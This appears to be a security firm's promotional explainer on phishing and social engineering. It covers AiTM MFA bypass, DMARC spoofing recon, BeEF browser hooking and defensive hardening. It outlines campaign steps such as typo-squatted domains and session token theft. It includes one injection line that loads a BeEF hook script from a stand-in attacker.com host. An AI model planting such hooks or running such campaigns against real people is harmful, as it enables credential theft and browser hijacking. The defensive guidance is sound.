███████╗ ██████╗  ██████╗██╗ █████╗ ██╗     
      ██╔════╝██╔═══██╗██╔════╝██║██╔══██╗██║     
      ███████╗██║   ██║██║     ██║███████║██║     
      ╚════██║██║   ██║██║     ██║██╔══██║██║     
      ███████║╚██████╔╝╚██████╗██║██║  ██║███████╗
      ╚══════╝ ╚═════╝  ╚═════╝╚═╝╚═╝  ╚═╝╚══════╝
                                                  
      ███████╗███╗   ██╗ ██████╗                  
      ██╔════╝████╗  ██║██╔════╝                  
      █████╗  ██╔██╗ ██║██║  ███╗                 
      ██╔══╝  ██║╚██╗██║██║   ██║                 
      ███████╗██║ ╚████║╚██████╔╝                 
      ╚══════╝╚═╝  ╚═══╝ ╚═════╝                  
                
    root@mhfh:~# cat /proc/intel/tactics/social-engineering.md

    Social Engineering:
    Advanced Phishing & Human Exploitation

    SECURITY CLEARANCE REQUIRED: LEGAL & ETHICAL DISCLAIMER

    The operational data, exploit methodologies, and vulnerability frameworks documented within the Mobile Hacker For Hire "Social Engineering" repository are classified for educational purposes, authorized security auditing, and ethical penetration testing ONLY. Operate with authorization.

    0x01. Patching the Human Element

    Despite multi-million dollar investments in Next-Generation Firewalls (NGFW), Endpoint Detection and Response (EDR), and Zero Trust architectures, the most reliable vector into any network remains its users. Human psychology does not have a patch cycle.

    Modern Social Engineering transcends simple Nigerian Prince emails. It involves sophisticated Pretexting, Adversary-in-the-Middle (AiTM) MFA bypasses, and highly targeted Spear-Phishing campaigns orchestrated through enterprise-grade frameworks.

    se_metrics.log
    Initial Access82% via Phishing
    MFA Bypass RateHigh (AiTM)
    Payload DeliveryMacro/ISO/ZIP
    FrameworksBeEF/Gophish

    Architecting the Phishing Campaign

    1. OSINT & Target Profiling

    Gathering intelligence from LinkedIn, corporate directories, and breached data to craft a believable pretext.

    2. Weaponized Infrastructure

    Registering typo-squatted domains, configuring SPF/DKIM/DMARC, and deploying AiTM reverse proxies.

    3. Payload & Credential Harvest

    Bypassing 2FA via session token theft, capturing credentials, and delivering stage-1 implants.

    Adversary-in-the-Middle attack flow diagram showing victim to Evilginx2 proxy to legitimate identity provider, intercepting session cookies to bypass MFA

    fig.1 — The Adversary-in-the-Middle (AiTM) flow intercepting session cookies to bypass Multi-Factor Authentication.

    0x02. The Anatomy of Human Exploitation

    Email Spoofing & SPF/DKIM Evasion

    Successful phishing relies on landing in the inbox. Attackers analyze a target's DNS records to find misconfigurations in Sender Policy Framework (SPF) or DMARC policies, allowing them to spoof legitimate internal emails.

    DNS Reconnaissance Example
    $cat recon.sh
    # Checking target DMARC policy
    dig +short TXT _dmarc.target.com
    # Checking SPF record
    dig +short TXT target.com | grep "v=spf1"

    The Trap: If DMARC is set to p=none, an attacker can trivially forge emails appearing to be from the CEO.

    Browser Exploitation Framework (BeEF)

    Once a victim clicks a link, the browser becomes the attack surface. BeEF hooks the victim's web browser, allowing the attacker to launch advanced modules like clipboard theft, network pivoting, and social engineering pop-ups (e.g., fake Flash updates).

    Hook Injection Payload
    $cat index.html
    <!-- Injecting the BeEF Hook into a compromised page or phishing site -->
    <script src="http://attacker.com:3000/hook.js"></script>

    0x04. Blue Team Mechanics: Hardening & Defense

    [ Enforce DMARC / SPF / DKIM ]

    Prevent domain spoofing by fully enforcing DMARC policies with p=reject or p=quarantine.

    $cat dns_records
    # Recommended DMARC TXT Record
    v=DMARC1; p=reject; rua=mailto:dmarc@target.com; ruf=mailto:dmarc@target.com; fo=1;

    [ FIDO2 / WebAuthn Hardware Keys ]

    Standard TOTP and SMS 2FA are vulnerable to AiTM attacks. Only FIDO2 hardware security keys (like YubiKey) provide phishing-resistant MFA by cryptographically binding the authentication attempt to the domain.

    Assess Organizational Readiness

    How susceptible is your workforce to a targeted Spear-Phishing or AiTM attack?Mobile Hacker For Hire provides objective-based Social Engineering engagements to test your human perimeter.